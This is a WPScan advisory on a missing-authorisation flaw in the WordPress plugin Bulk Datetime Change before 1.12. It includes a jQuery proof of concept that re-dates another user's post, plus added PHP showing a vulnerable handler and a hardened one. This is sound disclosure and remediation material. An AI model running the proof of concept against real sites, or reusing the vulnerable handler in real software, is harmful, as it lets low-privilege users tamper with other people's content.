WPScan

WordPress Plugin Vulnerabilities

Bulk Datetime Change < 1.12 - Missing Authorisation

Description

The plugin does not enforce capability checks, which allows users with the Contributor role to 1) list the private post titles of other users and 2) change the published date of other users' posts.

Proof of Concept

Run on "Bulk Datetime Change" page:

jQuery.post("https://example.com/wp-admin/admin.php?page=bulkdatetimechange", {
  // nonce read from the plugin's own page: it proves the request origin, not that the user may edit the post
  bulk_datetime_change_update: jQuery("#bulk_datetime_change_update").attr("value"),
  "bulk_date_check[]": "509",                     // ID of a post belonging to another user
  "bulk_date_update[509]": "2021-09-23+12:11:40", // new post date for that ID
  "bulk-datetime-change-update1": "1"             // submit parameter of the plugin's form
});
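The root cause is a handler that validates a nonce but never asks whether the current user may edit the posts it is given. The following PHP is an added illustration of that pattern and its hardened form; it is not the Bulk Datetime Change plugin's own code, and the function names, nonce action and request field names are hypothetical, modelled on the PoC above.

```php
<?php
// Added example (not the plugin's code). A nonce only proves the request came from
// the plugin's admin page; it says nothing about authorisation, so the vulnerable
// handler lets any user who can reach the page re-date any post ID they submit.
function bdc_example_update_dates_vulnerable() {
    check_admin_referer( 'bdc_example_update' ); // CSRF protection only
    foreach ( (array) $_POST['bulk_date_check'] as $post_id ) {
        $post_id  = absint( $post_id );
        $new_date = sanitize_text_field( $_POST['bulk_date_update'][ $post_id ] ?? '' );
        wp_update_post( array( 'ID' => $post_id, 'post_date' => $new_date ) ); // no capability check
    }
}

// Hardened handler: gate the page on a capability, then check the edit_post meta
// capability for every post ID in the request (WordPress maps it to edit_others_posts
// for posts the current user does not own), and validate the date before writing.
function bdc_example_update_dates_hardened() {
    if ( ! current_user_can( 'edit_others_posts' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'bdc_example_update' );
    $ids   = array_map( 'absint', (array) ( $_POST['bulk_date_check'] ?? array() ) );
    $dates = (array) ( $_POST['bulk_date_update'] ?? array() );
    $updated = array();
    foreach ( $ids as $post_id ) {
        if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
            continue; // deny posts this user may not edit instead of trusting the submitted ID
        }
        $new_date = sanitize_text_field( $dates[ $post_id ] ?? '' );
        // Accept only the "Y-m-d H:i:s" form (the "+" in the PoC is URL-encoded space).
        if ( ! DateTime::createFromFormat( 'Y-m-d H:i:s', $new_date ) ) {
            continue;
        }
        wp_update_post( array(
            'ID'            => $post_id,
            'post_date'     => $new_date,
            'post_date_gmt' => get_gmt_from_date( $new_date ),
        ) );
        $updated[] = $post_id;
    }
    return $updated;
}

// Listing side of the same bug: ask WP_Query for posts the current user may read, so a
// Contributor does not see other users' private titles (default queries include them
// when run in an admin context without the 'perm' argument).
function bdc_example_list_posts_hardened() {
    return get_posts( array( 'post_status' => array( 'publish', 'private' ), 'perm' => 'readable', 'numberposts' => -1 ) );
}
```

The fixed release (1.12) is the authoritative reference for how the plugin itself resolved this; compare the changeset linked below.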

Affects Plugins

bulk-datetime-change
Fixed in version 1.12

References

CVE
CVE-2021-24842
URL
https://plugins.trac.wordpress.org/changeset/2618982

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID
054bd981-dbdd-47dd-bad0-fa327e5860a2

Timeline

Publicly Published

2021-10-26

Added

2021-10-26

Last Updated

2022-04-08
